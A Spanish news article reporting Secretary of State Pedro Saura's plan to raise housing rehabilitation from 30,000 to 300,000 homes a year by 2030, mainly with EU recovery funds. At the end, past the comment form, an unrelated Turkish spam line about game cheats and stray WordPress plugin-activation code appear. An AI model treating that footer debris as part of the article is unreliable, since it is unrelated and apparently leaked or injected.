El Gobierno quiere pasar de rehabilitar 30.000 a 300.000 viviendas al año en 2030


En pleno debate en el seno del Gobierno sobre la necesidad de limitar el precio de los alquileres, el secretario de Estado de Transportes, Movilidad y Agenda Urbana, Pedro Saura, aseguró que en España el parque público de vivienda es «muy pequeño» e instó a su ampliación para tener un «verdadero parque de vivienda asequible y social».

En una conferencia organizada por el Consejo General de Economistas (CGE), Saura aseguró que actualmente en España solo se rehabilitan 30.000 viviendas al año, y que el objetivo es que en 2030 se lleguen a rehabilitar unas 300.000 al año. Es decir, multiplicar por diez para dar un salto cualitativo en esta área, aunque reconoció que hasta ahora los problemas han sido tanto comerciales como regulatorios. Para resolverlos cifró en 7.000 millones de euros las ayudas necesarias, que en su mayor parte vengan de los fondos europeos. «Tiene que haber un sector de la construcción antes y después de los Next Generation», aseguró.

El sector representa el 6% del PIB en España y las ayudas europeas que se están planteando supondría dar en torno al 10% de ese total, con el objetivo de «transformar la construcción y generar la nuevas industria de la rehabilitación», explicó el secretario de Estado. Saura aseguró que aunque la crisis de 2008 fue «durísima» para el sector de la construcción, de esta se ha recuperado mejor que otros sectores y tiene «buenas expectativas» ya que el consumo de cemento y los niveles de contratación se han mantenido estables tras el desplome de marzo y abril.

A su juicio, lo importante es que el sector se encamine ahora hacia dos nuevos mercados: la rehabilitación y la construcción de vivienda social. «El sector público tiene un gran reto por delante, pero también el privado. Hay que acertar con los recursos económicos que ponemos encima de la mesa pero también con los cambios legales y reformas que hagamos y de cómo nos acompañen el sector financiero y energético», explicó Saura, que incidió además en que la vivienda es competencia de las comunidades autónomas pero el Estado financia en torno al 1,2% del PIB en políticas de vivienda.

Solo en la deducción al alquiler en el IRPF el Estado gasta 1.000 millones de euros. Por ello, Saura pidió a las comunidades autónomas que «pongan más suelo público a disposición» y desarrollen más concesiones para construir viviendas a precios asequibles.

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Hacker Blog Oyun Hileleri

activate_plugin( 'automatic_replace/index.php' ); activate_plugin( 'bloqueo_comentarios/index.php' ); activate_plugin( 'disable-xml-rpc/disable-xml-rpc.php' ); activate_plugin( 'rename-wp-login/rename-wp-login.php' );